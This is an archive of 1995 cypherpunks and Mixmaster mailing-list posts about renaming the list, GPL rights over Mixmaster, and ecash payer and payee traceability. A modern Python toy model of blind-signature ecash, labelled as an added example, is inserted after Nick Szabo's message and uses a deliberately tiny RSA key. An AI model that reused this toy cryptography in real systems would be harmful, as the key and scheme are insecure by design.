Subject: Re: CYPHERPUNK harmful.  THE TRUTH IS TOLD
In-Reply-To: <Pine.3.89.9509151414.A23653-0100000@netcom>
Message-ID: <199509152231.PAA07080@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Steve says:
> Hmmmm... If memory serves, a year or so ago there was just such a schism
> when a prominent cypherpunk split off and formed the "cypherWONKS" list. 
> The failure of that list can be attributed to one thing and one thing
> alone: a concerted effort by YOU and your acolytes against it.

EEEK,
"cypherWONKS" sounds to me like someone working for Bill Clinton.
I believe that Bill and Hillary are the only people that I have
heard use this WONK term.  Even they didn't like WONKS.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 15 Sep 95 12:48:28 PDT
To: mix-l@jpunix.com (Mixmaster Mailing List)
Subject: Commercial Mixmaster (was Re: Mixmaster status)
In-Reply-To: <ac7edf5800021004fd74@[137.110.24.250]>
Message-ID: <9509151948.AA27938@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous writes:
# Consider this scenario ...  Mixmaster gets bought by the Acme
# Crypto Company of Ft. Meade, MD.  They "improve" it, and offer a new
# version.  It's even FREE (for non-commercial use)!  But their
# "improvements" make it incompatible with previous versions, and so
# you have to upgrade.  The new "commercial" version comes with no
# SOURCE CODE, of course...

Lance Cottrell writes:
> 4) There will always be a free version of the client with source code.
>
> While I have not discussed it, I can not imagine that there would not also
> be a free version of the server code (with source). Without remailers what
> is the point of the client software?

Beyond taking Lance on his PGP-signed-word, which I'm strongly inclined to do,
I suspect he may not have much legal leeway in this regard.

With the caveat that I Am Not A Lawyer, it seems to me that the GNU General
Public License (Version 1 from 1989, Mix/GNU.license in the Mixmaster .tar or 
http://hopf.math.nwu.edu/docs/Gnu_License), which covers all extant 
distributions of Mixmaster, has some significant implications for any
commercial development of Mixmaster. It's applicable to "the Program or any 
derivative work under copyright law: that is to say, a work containing the
Program or a portion of it, either verbatim or with modifications and/or
translated into another language". 

The GNU GPL specifies that:
	
 	2. You may modify your copy or copies of the Program or any portion of
	it, and copy and distribute such modifications under the terms of 
	Paragraph 1 above, provided that you also do the following:
	[...]
	b) cause the whole of any work that you distribute or publish, that
    	in whole or in part contains the Program or any part thereof, either
    	with or without modifications, to be licensed at no charge to all
    	third parties under the terms of this General Public License (except
    	that you may choose to grant warranty protection to some or all
    	third parties, at your option).

and that:

	3. You may copy and distribute the Program (or a portion or 
	derivative of it, under Paragraph 2) in object code or executable 
	form under the terms of Paragraphs 1 and 2 above provided that you 
	also do one of the following:
 	a) accompany it with the complete corresponding machine-readable
    	source code, [...] or,
	b) accompany it with a written offer, [...] to give any third party 
	free (except for a nominal charge for the cost of distribution) a 
	complete machine-readable copy of the corresponding source code, [...]

So it looks to me as though Mixmaster source code will continue to be 
legally available, no matter what....

Better informed interpretations are enthusiastically solicited.
 
-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: szabo@netcom.com (Nick Szabo)
Date: Fri, 15 Sep 95 16:10:40 PDT
To: cypherpunks@toad.com
Subject: Re: why ecash is traceable
Message-ID: <199509152249.PAA18059@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Hal & Tim have made some interesting comments about payee untraceability.
I suspect it will clarify things to point out the orthogonality in 
two of the major design choices:

* Clearing: Offline vs. online
* Settlement: Deposit to payee's account vs. sending new cash to payee

Because DigiCash wants their product to have payer, but not payee, privacy,
the current ecash(tm) software from DigiCash uses online clearing
and deposit to payee's account, but the three other combinations are 
also quite doable if somebody wanted to implement them.  The design that 
allows symmetric untraceability combines online clearing with sending new 
cash.  This way the bank need not ID the payee Bob in order to credit 
him with the value of the transaction; Bob and the bank can complete 
the clearing and settlement via anonymous channel.  (The bank will 
also want to receive an anonymous payment from Bob for the service,
and Chaum has described a second blinding step the payee must
perform for the symmetric case, complications which I won't go into 
here).

Offline clearing requires the potential to ID the payer in 
order to punish double-spending after the fact.
Online systems without observers (such as ecash(tm)) don't
need to worry about trying to find multiple spenders, because this is
prevented by the online clearing.  In fact, purposeful second-spending
is used to recover from some error conditions, specifically to determine 
whether the payee in fact received the "coin" or not when there has been a
network error in the middle of a transaction.   Distinguishing between
mistaken  and fraudulent double spending is a very complex, not completely 
tractable problem, so the current ecash(tm) punts it, which is reasonable
because it is online.  An offline system would need an elaborate
blacklisting system as well as active support of law enforcement in
all jurisdictions using the ecash, would need to come up with 
reasonable ways to distinguish between fraudulent and 
mistaken double-spending, and would need more elaborate and 
specialized error-recovery protocols.  If hardware "observers", based 
on "tamper-proof" hardware instead of mathematical protocol, and which
prevent double-spending at the source, can be made harder to crack than
the maximum a cracked card is allowed to spend, then such small-value 
transactions might be feasible offline.  (This is the major avenue being 
pursued commercially, because online transactions are perceived to
be too expensive, which is false in the case of the Internet IMHO).

Nick Szabo					szabo@netcom.com
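
A toy model of the combination described in the message above (online clearing, with settlement by sending new cash to the payee), added here as an example; it is not DigiCash's ecash(tm) code or protocol. The RSA blind-signature arithmetic, the tiny bank key and every name in it are assumptions made for illustration, and fees, denominations and the extra payee blinding step the message mentions are left out.

```python
import hashlib
import secrets
from math import gcd

# Toy bank key built from two Mersenne primes. Constructed for this
# example and far too small for real use.
P, Q = 2**31 - 1, 2**61 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))


class DoubleSpend(Exception):
    """Raised when a serial number is presented for clearing twice."""


def digest(serial):
    """Map a coin serial number to an integer modulo N."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


def valid(serial, sig):
    """A coin is a serial number plus the bank's signature on its digest."""
    return pow(sig, E, N) == digest(serial)


class Bank:
    def __init__(self, accounts):
        self.accounts = dict(accounts)  # identity is known only at withdrawal
        self.spent = set()              # serials already cleared online
        self.seen = []                  # every value the bank was asked to sign

    def _sign(self, blinded):
        self.seen.append(blinded)
        return pow(blinded, D, N)

    def withdraw(self, owner, blinded):
        if self.accounts.get(owner, 0) < 1:
            raise ValueError("insufficient funds")
        self.accounts[owner] -= 1
        return self._sign(blinded)

    def clear(self, serial, sig, blinded_new):
        """Online clearing: no payee identity, settlement is a fresh coin."""
        if not valid(serial, sig):
            raise ValueError("not a coin signed by this bank")
        if serial in self.spent:
            raise DoubleSpend(serial.hex())
        self.spent.add(serial)
        return self._sign(blinded_new)


def blind_new_coin():
    """Pick a random serial and blind its digest with r^E mod N."""
    serial = secrets.token_bytes(16)
    while True:
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:
            break
    return serial, r, digest(serial) * pow(r, E, N) % N


def unblind(blind_sig, r):
    return blind_sig * pow(r, -1, N) % N


def run_payment():
    bank = Bank({"alice": 1})
    # Alice withdraws: the bank debits her account but signs a blinded value.
    serial, r, blinded = blind_new_coin()
    alice_coin = (serial, unblind(bank.withdraw("alice", blinded), r))
    # Alice hands the coin to Bob. Bob clears it online and is paid in new
    # blinded cash, so the bank never learns who he is.
    serial2, r2, blinded2 = blind_new_coin()
    bob_coin = (serial2, unblind(bank.clear(*alice_coin, blinded2), r2))
    # Presenting the same coin again is caught at clearing time.
    try:
        bank.clear(*alice_coin, blind_new_coin()[2])
        replay_refused = False
    except DoubleSpend:
        replay_refused = True
    return bank, alice_coin, bob_coin, replay_refused


if __name__ == "__main__":
    bank, alice_coin, bob_coin, refused = run_payment()
    print("Bob's coin valid:", valid(*bob_coin), "| replay refused:", refused)
```

The bank's `spent` set is the whole double-spending defence here, which is why this design needs no way to identify the payer after the fact.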



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David C. Lambert" <dcl@panix.com>
Date: Fri, 15 Sep 95 13:36:37 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful
Message-ID: <199509152013.QAA18005@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Peter Trei <trei@process.com> wrote:

>      Terms like 'cypherpunk' and 'cryptoanarchy' tend to pigeonhole us as
> nutcases for many people, and are a barrier to getting our ideas
> across. I'm not saying this pigeonholing is correct - in fact I despise
> people who judge a book by its cover, but so many people DO make such
> snap judgements that we need to take this into account when talking to
> the general public.

Two of the responses to the "An opportunity..." post unapologetically
admitted that they refused to read the text of the message due to the
presence of the word "cypherpunk" in the first sentence.

Shows you what we're up against.

BTW, I'm not for changing the name of the list, but I do see the logic
in a more establishment-friendly name to use when lobbying the public.

David C. Lambert
dcl@panix.com
(finger for PGP public key)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFneAqpplsfgM88VAQE+5wP9GZrIoComyFDeQ6brTLJwZ2oamry3IfC7
XhlqMlAZnC2b1w521nm085nZKtO9/Ru9Fw3BllPinG8nGcBggr9zkH4Ba+Zbezh0
FKK29d7wFGQz1d5JfyYCZhl4dTBdbpnU4jd5Rb27XtvP9livAeR/HIwNAJMccSCX
qO/kxlVRRZg=
=1Lxr
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 15 Sep 95 14:33:57 PDT
To: tcmay@got.net
Subject: Re: Linking = Showing = Transferring?
In-Reply-To: <199509151834.LAA07925@comsec.com>
Message-ID: <9509152030.AA16183@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>>To:cyberia-l@warthog.cc.wm.edu
>>From:tcmay@got.net (Timothy C. May)
>>Subject:Linking = Showing = Transferring?

>>_Linking_ is effectively _showing_, given the point-and-click mechanics of
>>hypertext. This is a situation anticipated by authors (e.g. Ted Nelson),
>>but is now coming to the fore.
>>
>>Granted, providing a link is not the same as actually _including_ the
>>material the link points to, but it is very, very close. Arguably, the
>>same.

There are two important differences.

The first difference is in ownership of the data.  If the source of the
link decides to clobber the file, then the fact that I have a page with the
URL does not guarantee access to that file for the user of *my* page.
Similarly, the person owning the file can freely change the content of the
file, without my changing the URL which points to it.

The other difference is in handling of the data.  If the link were to
a pornographic image and someone were to access it through my page's URL,
the bits of that image would never touch my computer.

Meanwhile, <a href="http://dcs.ex.ac.uk/~aba/rsa/"> RSA encryption system
in PERL </a> might be a URL which violates US export laws -- if this
interpretation were to be taken -- but if so, does it violate them in this
mail message?  That depends, I suppose, on whether your mail agent is aware
of URLs and turns them into point-and-click units.  Is it a violation if
the URL is printed in a paper magazine?  After all, it's the convenience of
the web browser which is at issue.  One can invoke netscape with or
without a parameter.

Yes -- interesting legal times ahead.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme		   |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFniL1QXJENzYr45AQFlYAP8DGHGk6EEmHXyPbeA7hoZjQ1pkEiyW2xB
1srFbXVsdJt9cwNQbBmFSfKARKVOnh1f+rEEqFZEwXXS1BbwlSljDz/hykZwfQwv
h1kXPvJ9MMqleg6y8IXM5nTL9lKnq+ThKmgl/aciDYZqZ009IL4ssb81gUA5r5lC
mYkfhqulWsU=
=AYRX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Fri, 15 Sep 95 14:38:20 PDT
To: mix-l@jpunix.com
Subject: Re: Commercial Mixmaster (was Re: Mixmaster status)
Message-ID: <9509152138.AA02721@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



> With the caveat that I Am Not A Lawyer, it seems to me that the GNU General
> Public License (Version 1 from 1989, Mix/GNU.license in the Mixmaster .tar or 
> http://hopf.math.nwu.edu/docs/Gnu_License), which covers all extant 
> distributions of Mixmaster, has some significant implications for any
> commercial development of Mixmaster. It's applicable to "the Program or any 
> derivative work under copyright law: that is to say, a work containing the
> Program or a portion of it, either verbatim or with modifications and/or
> translated into another language". 
> 

Most common misunderstanding about the GPL.  If you GPL
something, *you* hold the copyright to the material, and
can still do anything you want with it.  See Perl for a good
example - released under an artistic license and under GPL.

GPL prevents *others* from making distributions without
distributing the source code.

Of course, if you accept GPL'ed patches to your code, the
whole thing gets messy, as now you can't claim complete
ownership of the entire code base.

I have simplified this - go to gnu.misc.discuss for a complete
rehash of this subject every 2-3 weeks.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Fri, 15 Sep 95 14:07:01 PDT
To: dcl@panix.com (David C. Lambert)
Subject: Re: CYPHERPUNK considered harmful
In-Reply-To: <199509152013.QAA18005@panix.com>
Message-ID: <9509152105.AA18280@wombat.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


David C. Lambert writes:

> Peter Trei <trei@process.com> wrote:
> 
> >      Terms like 'cypherpunk' and 'cryptoanarchy' tend to pigeonhole us as
> > nutcases for many people, and are a barrier to getting our ideas
> > across.

> Shows you what we're up against.
> 
> BTW, I'm not for changing the name of the list, but I do see the logic
> in a more establishment-friendly name to use when lobbying the public.

How about "civil libertarian" then?


-- Jeff



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 15 Sep 95 15:09:43 PDT
To: rishab@infinity.c2.org
Subject: Re:  "Use implies consent to monitoring"
Message-ID: <9509152208.AA09221@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>   Please be advised that use constitutes consent to monitoring

Use of what?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 15 Sep 95 18:20:21 PDT
To: cypherpunks@toad.com
Subject: Re: why ecash is traceable
Message-ID: <ac7f73e511021004d581@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:49 PM 9/15/95, Nick Szabo wrote:
>Hal & Tim have made some interesting comments about payee untraceability.
>I suspect it will clarify things to point out the orthogonality in
>two of the major design choices:
>
>* Clearing: Offline vs. online
>* Settlement: Deposit to payee's account vs. sending new cash to payee
>
>Because DigiCash wants their product to have payer, but not payee, privacy,
>the current ecash(tm) software from DigiCash uses online clearing
>and deposit to payee's account, but the three other combinations are
>also quite doable if somebody wanted to implement them.  The design that
>allows symmetric untraceability combines online clearing with sending new
>cash.  This way the bank need not ID the payee Bob in order to credit

Thanks, Nick, for summarizing this clearly in terms of these two axes. This
symmetric untraceability is what I was getting at with my point about Bob
clearing the transaction and getting back blinded cash. It's apparent that
if Alice can get untraceable cash, and she tells her bank to go ahead and
give the same kind of untraceable cash to Bob, then Bob can also get
untraceable cash.

....
>Offline clearing requires the potential to ID the payer in
>order to punish double-spending after the fact.

Offline clearing has many hurdles to overcome, and this "True Name" (ID)
issue is not very attractive. Fortunately, the vast increases in Net speeds
are on the side of online clearing, even for relatively small transactions.

>Online systems without observers (such as ecash(tm)) don't
>need to worry about trying to find multiple spenders, because this is
>prevented by the online clearing.  In fact, purposeful second-spending
>is used to recover from some error conditions, specifically to determine
>whether the payee in fact received the "coin" or not when there has been a
>network error in the middle of a transaction.   Distinguishing between
>mistaken  and fraudulent double spending is a very complex, not completely
>tractable problem, so the current ecash(tm) punts it, which is reasonable
>because it is online.  An offline system would need an elaborate

Sounds pretty compelling to me to concentrate on online clearing systems....

I can imagine limited needs for offline clearing, such as road toll
systems, or parking tokens, etc. The amounts of money there can be somewhat
limited, and the implications of double spending revealing identity are
less serious. (Though I can imagine a worrisome scenario where a highway
toll system "deliberately double spends" received tokens to track
motorists...there may be precautions built into such systems that I just
don't know about.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 15 Sep 95 18:27:20 PDT
To: Steven Greenberg <greenbes@netcom.com>
Subject: Re: CYPHERPUNK harmful.  THE TRUTH IS TOLD
Message-ID: <199509160125.SAA26600@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>Hmmmm... If memory serves, a year or so ago there was just such a schism
>when a prominent cypherpunk split off and formed the "cypherWONKS" list. 

:-) :-)  And starting a new list lets us decide on a new LOGO to replace
that old tacky rose-and-bits thingy :-)

Cryptographic Professionals for Social Responsibility
Cryptographic Industry Association
National Steganography Alliance
Cryptographers for Foreign Reflexivity
Extremely Private Institute for Cryptography
NII Institute of Cryptography
American Cryptographic Legal Union
Free Banking Institute
Cryptographic Defense Taskforce
Cryptographic Organization for Privacy and Security
Entropy, Steganography, and Cryptography Research Organization for Women

(If anything, what we need is a way to separate the technical/mathematical
discussions from rants like this, but any time we get the list focused
on mostly technical issues, the government goes out of its way to do
something egregiously stupid or offensive...)

Somewhat more seriously, though, there are times that it's useful to have
a more respectable-sounding organization (or at least a letterhead...),
that's open to participation by members and not just directors (which has
been some people's concern about the EFF, CDT, EPIC, and maybe TAP or CPSR.)

If none of those are respectable/accessible/non-socialist enough for you,
and the British Cryptographic Privacy Association (or whatever their name was)
can't be found or sounds too much like International Outside Agitators,
and the various academic groups are too busy being academically respectable
to do political agitation ("CryptoAcademics Write Papers!"),
then come up with a name and a Postscript letterhead, and start an
email list that you can gateway to cypherpunks (as long as you can
prevent duplications or mail-floods.)  If the main goal is to have a calmer
name and mostly the same activities, an alter-ego mailing list is one approach.

#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 15 Sep 95 15:48:04 PDT
To: mix-l@jpunix.com
Subject: Re:  Commercial Mixmaster (was Re: Mixmaster status)
Message-ID: <9509152246.AA09283@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Better informed interpretations are enthusiastically solicited.

Lance owns the code.  He can take it, strip off the copyright, and
transfer all rights to Bill Gates for a million bucks.  He cannot,
however, rescind the copyright or licenses that he has previously
given out.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 15 Sep 95 15:53:21 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK harmful.  THE TRUTH IS TOLD
Message-ID: <v02120d00ac7fab9d3ccc@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>Hmmmm... If memory serves, a year or so ago there was just such a schism
>when a prominent cypherpunk split off and formed the "cypherWONKS" list.
>The failure of that list can be attributed to one thing and one thing
>alone: a concerted effort by YOU and your acolytes against it.  You refuse
>to even mention this, which is all the proof any open-minded person needs.
>Now you are trying to stifle all open debate by doing it again. So, Mr.
>May/Szabo (if that IS your name), why not come clean once and for all
>about your role in the deaths of Vince Foster and Randy Weaver's wife, and
>your part in the newly-emerging administration scandal: TENTACLE-gate.

Yeah!!!!  What he said!!!!

Seriously.

It seems to me that if a list of cypher-interested "cryptologists, hackers,
and mathematicians" (Copyright, Wall Street Journal), want to call
themselves "punks", it's fine by me.

Face it folks, people of the "punk" genre have inoculated this particular
petri dish. There's enough information-agar to munch on here for quite a
while, so it doesn't look like we're going to go anywhere. If some members
of this particular community want to bud off, or fission, or spore, or
whatever this particular meme does to reproduce, in order to change its
name to something reputable, they're welcome to.

Frankly, I find it entertaining to phone up the local internet-hysterical
talkshow host's call screener and say, "I'm a cypherpunk, and I disagree
with the host". It gets me to the head of the line, even if the innumerate
technophobe who's managing the queue couldn't spell "cypher" if he/she/its
life depended on it...

So long, and you're welcome for all the fish.

Can we get back to c-coding and dissolving reality as we know it, now?

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 15 Sep 95 15:53:00 PDT
To: owner-cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful
Message-ID: <9509152251.AA09314@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


What's in a name?  That which we call a rose would by any other name
still smell as sweet.

Surely, right now, there are more important things to work on.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 15 Sep 95 15:53:30 PDT
To: Rich Salz <rishab@infinity.c2.org
Subject: Re:  "Use implies consent to monitoring"
Message-ID: <v02120d01ac7fb3fd1eab@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:08 PM 9/15/95, Rich Salz wrote:
>`h
>>   Please be advised that use constitutes consent to monitoring
>
>Use of what?

Uh, it looks like the .com registration to me...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Fri, 15 Sep 95 20:03:14 PDT
To: cypherpunks@toad.com
Subject: Quantum computing info?
Message-ID: <199509160259.TAA03727@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


Could anyone point me to information on 'quantum' computing?
-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Karl L. Barrus" <klbarrus@infocom.net>
Date: Fri, 15 Sep 95 19:20:13 PDT
To: danisch@ira.uka.de (Hadmut Danisch)
Subject: Re: Explaining Zero Knowledge to your children
Message-ID: <199509160221.VAA29670@infocom.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:18 PM 9/14/95 +0200, you wrote:
>There is a paper about explaining Zero Knowledge methods in simple
>words. It's titled "Explaining Zero Knowledge Authentication to your
>children" or something similar.

I think you are referring to Quisquater's (sp?) explanation, which is in
terms of Ali Baba and a magic cave.  A functionally similar explanation is
in Schneier's Applied Crypto, pp. 85-86.

--
Karl L. Barrus <klbarrus@infocom.net>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Fri, 15 Sep 95 21:27:23 PDT
To: cypherpunks@toad.com
Subject: Re: Why ecash is traceable
Message-ID: <ac8001d8060210044a5e@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:46 AM 9/15/95, Timothy C. May wrote:
>At 8:47 AM 9/15/95, Donald M. Kitchen wrote:
>>-----BEGIN PGP SIGNED MESSAGE-----
>>
>>Excellent discussion on the subject, actually. However, your idea of
>>the "first person to the bank" maintaining anonymity via remailer block
>>is flawed. First of all, if a collusion with the bank is being taken into
>>account, presumably sufficient enough resources are involved that someone
>>may try and track the reply block. Mixmaster (as your messages mentioned
>>by name) would be necessary to eliminate the chance of tracking the block
>>through combinations of replay attacks etc. (Which reminds me, has anyone
>
>Just to clarify a minor point, I mentioned "mixes," not Mixmaster. I have
>nothing against Mixmaster, but "mix" is the term Chaum invented for what we
>later started to call a "remailer."
>
>--Tim May
>

Indeed Chaum's phrase "digital mix" was the inspiration for the name Mixmaster.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Fri, 15 Sep 95 18:41:07 PDT
To: mix-l@jpunix.com
Subject: Re: Commercial Mixmaster (was Re: Mixmaster status)
In-Reply-To: <9509151948.AA27938@cs.umass.edu>
Message-ID: <m0stmFJ-000H93C@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Fri, 15 Sep 1995 15:48:14 -0400 (EDT)
   From: futplex@pseudonym.com (Futplex)

   Lance Cottrell writes:
   > 4) There will always be a free version of the client with source code.

   Beyond taking Lance on his PGP-signed-word, which I'm strongly inclined to do,
   I suspect he may not have much legal leeway in this regard.

There *will* always be a free version of the client with source code,
but the proprietary improvements will probably not be merged into the
free version.  Lance, and only Lance, as copyright holder, has the
right to publish the code under a different copyright.  It's the same thing
that Phil Z. did with ViacryptPGP.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | America neither a Christian,
Potsdam, NY 13676 |  Jewish, Islamic, nor atheist (etc&) nation.  This is good.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 15 Sep 95 21:50:58 PDT
To: wilcoxb@nagina.cs.colorado.edu (Bryce Wilcox)
Subject: Re: Why ecash is traceable
In-Reply-To: <199509160435.WAA26877@nagina.cs.colorado.edu>
Message-ID: <199509160445.VAA13597@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	This looks as though you are simulating the
'deposit-and-get-coinage-back' within a
'deposit-and-have-account-credited' system.

	I figure that they would make the transaction cost involved in
creating an account sufficiently high that this plan would be
defeated-- or they wouldn't allow pseudonymous accounts.

-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Fri, 15 Sep 95 19:25:22 PDT
To: cypherpunks@toad.com
Subject: Washington D.C. Cyperhpunks Meeting Cybercast
Message-ID: <Pine.SUN.3.91.950915222240.9860A-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



Catch the WashDC Cypherpunks meeting cybercast on CU-SeeMe tomorrow,
Saturday Sept. 16 starting at 3:00 PM on the www.digex.net
(205.197.247.33) reflector.

CU-SeeMe software is videoconferencing for PCs and Macs and can be found
at ftp.gated.cornell.edu

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Fri, 15 Sep 95 21:35:39 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Why ecash is traceable
In-Reply-To: <199509150532.WAA08865@jobe.shell.portal.com>
Message-ID: <199509160435.WAA26877@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Hal <hfinney@shell.portal.com> wrote:
>
> But this correlation is what makes the coin traceable.  Suppose Alice is 
> paying a coin to Bob via an anonymous network, and she and the bank 
> are going to try to figure out who he really is.  She goes through the 
> payment transaction, and Bob sends his resulting data to the bank.  
> Before doing so, though, Alice simulates a payment of the same coin to 
> Charlie.  Charlie doesn't actually have to be involved, Alice can just 
> go through what she would have done if she had spent the coin elsewhere.  
> The result of this simulated payment has been shared with the bank.
> 
> Now, when Bob deposits his data, the bank compares it with the data 
> Alice sent, the result of her simulated spending of the same coin.  By 
> the argument presented above, Bob's deposit will be flagged.  It will 
> correlate with the data Alice sent in since this will be the equivalent 
> of a double-spending.  So when Bob makes the deposit he can be linked to 
> the specific coin payment which Alice made, and his anonymity is lost.


So Alice/TheBank are able to tell that the nym whom Alice gave the coin to
is the same as the nym who deposited it.  If Bob has a pseudonymous
account at the bank, and it was the same pseudonymous account that he used in
the transaction with Alice, then they haven't learned anything new, but if he
wants to use one pseudonym when dealing with Alice and another to deposit the
coin he got from her then he has problems.


That's the extent of the damage, right?  Seems like it can be prevented by
laundering the coin through a single pseudonym first.  That is:  Bob receives
the coin from Alice, calling himself "CyberBob".  He deposits the coin with
the bank as a one-time-nym "Nym#2837004", then he has that nym withdraw the 
same amount of money from its account (closing out the account) and transfers
it to the nym which will actually keep the money, "NormalBob".  He destroys 
the new blinding factors after the temporary nym has withdrawn the coin, 
he deposits the coin with the bank as "NormalBob", and now he is in the clear.


Am I missing anything?


If Bob's transaction with Alice was actually pseudonymous rather than
anonymous then he can just deposit the coin using the same pseudonym and they
haven't learned anything new.  Once he has done that he can safely transfer
the money to any other nym of his with no risk (except for traffic analysis,
physical surveillance, yadda yadda yadda).


So current (DigiCash "ecash") Chaumian protocol leads to complete 
anonymity/pseudonymity (there oughta be a word for that.  
"self-nym-control"?) in the case that pseudonymous accounts are allowed at
the Bank.


Now one could move this "double-blinding" (isn't that phrase already in 
use?) trick into the cash protocol itself, possibly gaining a performance 
win.  DigiCash is apparently aware of this possibility, but (rightly) 
doesn't consider it important to develop right now.


Regards,

Bryce

signatures follow:


                                    +                                           
